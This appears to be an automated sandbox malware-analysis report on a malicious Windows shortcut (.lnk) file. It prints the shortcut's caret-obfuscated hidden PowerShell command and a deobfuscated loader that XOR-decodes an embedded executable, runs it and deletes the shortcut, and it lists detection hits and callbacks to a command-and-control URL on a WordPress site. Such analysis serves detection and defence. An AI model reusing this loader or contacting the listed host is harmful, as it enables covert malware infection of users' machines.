vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\W
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
    Source: knfV5IVjEV.lnkReversingLabs: Detection: 21%
    Source: knfV5IVjEV.lnkVirustotal: Detection: 29%Perma Link
    Source: knfV5IVjEV.lnkJoe Sandbox ML: detected
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DDCB60 _strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,8_2_00007FF7F1DDCB60
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DDF310 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_00007FF7F1DDF310
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DDF4E0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,8_2_00007FF7F1DDF4E0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DE64F0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,8_2_00007FF7F1DE64F0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DE9C9C CryptHashData,8_2_00007FF7F1DE9C9C
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DE9C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,8_2_00007FF7F1DE9C20
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DE9BD0 CryptAcquireContextA,CryptCreateHash,8_2_00007FF7F1DE9BD0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DE934C CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,8_2_00007FF7F1DE934C
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DE8F14 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,8_2_00007FF7F1DE8F14
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DE6560 CryptHashData,8_2_00007FF7F1DE6560
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DE6570 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,8_2_00007FF7F1DE6570
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E8CB60 _strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,12_2_00007FF700E8CB60
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E8F310 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_00007FF700E8F310
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E99BD0 CryptAcquireContextA,CryptCreateHash,12_2_00007FF700E99BD0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E9934C CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,12_2_00007FF700E9934C
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E964F0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,12_2_00007FF700E964F0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E8F4E0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,12_2_00007FF700E8F4E0
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E99C9C CryptHashData,12_2_00007FF700E99C9C
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E99C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,12_2_00007FF700E99C20
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E96570 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,12_2_00007FF700E96570
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E96560 CryptHashData,12_2_00007FF700E96560
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E98F14 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,12_2_00007FF700E98F14
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: -----BEGIN PUBLIC KEY-----8_2_00007FF7F1DBD6F4
    Source: GSlLzFnTov.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
    Source: unknownHTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49703 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49713 version: TLS 1.2
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: lib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: on.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: curl.pdb source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr
    Source: Binary string: .pdb8; source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 089\System.Core.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: *on.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
    Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DB20E0 malloc,recv,send,WSAGetLastError,8_2_00007FF7F1DB20E0
    Source: global trafficHTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey0 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: */*
    Source: global trafficHTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey1 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: */*
    Source: global trafficHTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey0 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: */*
    Source: global trafficHTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey1 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: */*
    Source: GSlLzFnTov.exeString found in binary or memory: Usage: curl [options...] <url>
    Source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: GSlLzFnTov.exeString found in binary or memory: Usage: curl [options...] <url>
    Source: GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: GSlLzFnTov.exe.1.drString found in binary or memory: Usage: curl [options...] <url>
    Source: unknownDNS traffic detected: queries for: jethropc.com
    Source: powershell.exe, 00000003.00000002.1371102592.000001EFEF822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1371102592.000001EFEF965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000003.00000002.1321328788.000001EFDF7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1332789256.00000263114C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000006.00000002.1332486385.000002630F825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
    Source: powershell.exe, 00000003.00000002.1321328788.000001EFDF7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1332789256.00000263114C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: GSlLzFnTov.exeString found in binary or memory: https://curl.se/
    Source: GSlLzFnTov.exe, 00000008.00000000.1395599061.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453696864.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460845940.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503652165.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.drString found in binary or memory: https://curl.se/P
    Source: GSlLzFnTov.exeString found in binary or memory: https://curl.se/docs/copyright.html
    Source: GSlLzFnTov.exe, 00000008.00000000.1395599061.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453696864.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460845940.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503652165.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.drString found in binary or memory: https://curl.se/docs/copyright.htmlD
    Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.drString found in binary or memory: https://curl.se/docs/hsts.html
    Source: GSlLzFnTov.exeString found in binary or memory: https://curl.se/docs/hsts.html#
    Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.drString found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: GSlLzFnTov.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
    Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.drString found in binary or memory: https://curl.se/docs/sslcerts.html
    Source: GSlLzFnTov.exeString found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
    Source: GSlLzFnTov.exe.1.drString found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
    Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000006.00000002.1332789256.0000026312AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=
    Source: knfV5IVjEV.lnkString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago
    Source: GSlLzFnTov.exe, 0000000C.00000002.1482744214.000001C4E4517000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481469904.000001C4E455D000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1483163619.000001C4E4528000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481507863.000001C4E4527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
    Source: GSlLzFnTov.exe, 0000000C.00000002.1482744214.000001C4E4517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0%
    Source: GSlLzFnTov.exe, 00000008.00000003.1414842290.0000024D89B89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com
    Source: GSlLzFnTov.exe, 00000008.00000003.1414909781.0000024D89B89000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1483163619.000001C4E4528000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481507863.000001C4E4527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com##
    Source: GSlLzFnTov.exe, 00000008.00000002.1415329869.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1415114903.0000024D89B66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0rz
    Source: GSlLzFnTov.exe, 00000008.00000002.1415329869.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1415114903.0000024D89B66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0wz
    Source: GSlLzFnTov.exe, 0000000E.00000002.1503333491.0000022C409D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
    Source: GSlLzFnTov.exe, 00000009.00000002.1438709537.000002AD152F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1Pu_
    Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1T
    Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1e
    Source: GSlLzFnTov.exe, 00000009.00000003.1435646730.000002AD15329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.com##O
    Source: GSlLzFnTov.exe, 00000009.00000003.1435462912.000002AD15329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.comqu
    Source: GSlLzFnTov.exe, 0000000E.00000002.1503333491.0000022C409D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1ji2
    Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1y
    Source: powershell.exe, 00000003.00000002.1371102592.000001EFEF822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1371102592.000001EFEF965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownHTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49703 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49713 version: TLS 1.2

    System Summary

    barindex
    Source: knfV5IVjEV.lnk, type: SAMPLEMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: amsi64_7732.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: 00000003.00000002.1383867622.000001EFF7AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
    Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: Initial fileStrings: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago
    Source: unknownProcess created: Commandline size = 2948
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2948
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2948Jump to behavior
    Source: knfV5IVjEV.lnkLNK file: /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function 